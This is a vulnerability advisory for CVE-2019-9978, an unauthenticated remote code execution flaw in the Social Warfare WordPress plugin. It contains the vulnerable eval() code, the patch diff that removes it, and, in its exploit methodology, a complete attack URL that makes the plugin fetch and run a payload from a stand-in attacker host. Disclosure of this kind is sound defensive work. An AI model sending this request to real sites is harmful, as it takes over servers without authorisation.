
Social Warfare - Unauthenticated Remote Code Execution

Summary

Description Details
Name Social Warfare - Unauthenticated Remote Code Execution
Summary Vulnerability while importing settings from another site
Affected application Social Warfare Wordpress plugin
Affected revision 3.5.1, 3.5.2
Vendor update available Yes
CVE CVE-2019-9978
Ids CWE-94
CVSSv3.0 Base Score 10.0
CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L/E:P/RL:O/RC:C
Public Exploit available Yes
Exploit verified Yes
Authentication Required No

Vulnerable Code

// wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
// The fetch target is taken straight from the query string: the server requests
// whatever URL the caller supplies (a server-side request) and the raw response
// body is the value that reaches eval() further down in this excerpt.
$options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');

...

     // Wraps the remote response body in a `return ...;` statement, i.e. turns a
     // caller-controlled string into PHP source. Nothing in this excerpt checks
     // that the body is a plain array literal before it is handed to eval().
     $array = 'return ' . $options . ';';

...

try {
      // eval() compiles and runs the fetched string with the web server's
      // privileges. Catching ParseError (the only handler the original code had)
      // covers unparseable input only; syntactically valid PHP executes, which is
      // the remote code execution described by CVE-2019-9978.
      $fetched_options = eval( $array );
    }

Exploit Methodology

The attacker will have to do the following to exploit this vulnerability:

  • Find sites running vulnerable version of this plugin
  • Needs a url to render payload (say, http://ATTACKER_HOST/payload.txt)
  • Run attack http://site_name/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt
  • Attacker can upload malware and maintain access or redirect visitors to malicious sites or can deface the site

Security Patch

--- a/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
+++ b/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
@@ -218,70 +218,6 @@ class SWP_Database_Migration {
            // }


-            /**
-             * Migrates options from $_GET['swp_url'] to the current site.
-             *
-             * @since 3.4.2
-             */
-            if ( true == SWP_Utility::debug('load_options') ) {
-                  if (!is_admin()) {
-                        wp_die('You do not have authorization to view this page.');
-                  }
-
-                  $options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');
-
-                  //* Bad url.
-                  if (!$options) {
-                        wp_die('nothing found');
-                  }
-
-                  $pre = strpos($options, '<pre>');
-                  if ($pre != 0) {
-                        wp_die('No Social Warfare found.');
-                  }
-
-                  $options = str_replace('<pre>', '', $options);
-                  $cutoff = strpos($options, '</pre>');
-                  $options = substr($options, 0, $cutoff);
-
-                  $array = 'return ' . $options . ';';
-
-                  try {
-                        $fetched_options = eval( $array );
-                  }
-                  catch (ParseError $e) {
-                        $message = 'Error evaluating fetched data. <br/>';
-                        $message .= 'Message from error: ' . $e->getMessage() . '<br/>';
-                        $message .= 'Fetched data: <br/>';
-                        $message .= var_export($fetched_options, 1);
-                        wp_die($message);
-                  }
-
-                  if (is_array( $fetched_options) ) {
-                        foreach( $fetched_options as $key => $value) {
-                              if (strpos( $key, 'license' ) > 0) {
-                                    unset( $fetched_options[$key] );
-                              }
-                              if (strpos( $key, 'token' ) > 0) {
-                                    unset( $fetched_options[$key] );
-                              }
-                              if (strpos( $key, 'login' ) > 0) {
-                                    unset( $fetched_options[$key] );
-                              }
-                        }
-                        //* Preserve filtered data, such as license keys.
-                        $new_options = array_merge( get_option('social_warfare_settings'), $fetched_options );
-
-                        if (update_option( 'social_warfare_settings', $new_options )) {
-                              wp_die('Social Warfare settings updated to match ' . $_GET['swp_url']);
-                        }
-                        else {
-                              wp_die('Tried to update settings to match ' . $_GET['swp_url'] . ', but something went wrong or no options changed.');
-                        }
-                  }
-
-                  wp_die('No changes made.');
-            }

            if ( true === SWP_Utility::debug('get_filtered_options') ) :
                  global $swp_user_options;
@@ -292,9 +228,7 @@ class SWP_Database_Migration {
            endif;

            if ( true == SWP_Utility::debug('get_post_meta') ) :
-
                  add_action( 'template_redirect', array( $this, 'print_post_meta' ) );
-
            endif;

            /**

References

MISC:https://twitter.com/warfareplugins/status/1108852747099652099
MISC:https://wordpress.org/plugins/social-warfare/#developers
MISC:https://wpvulndb.com/vulnerabilities/9238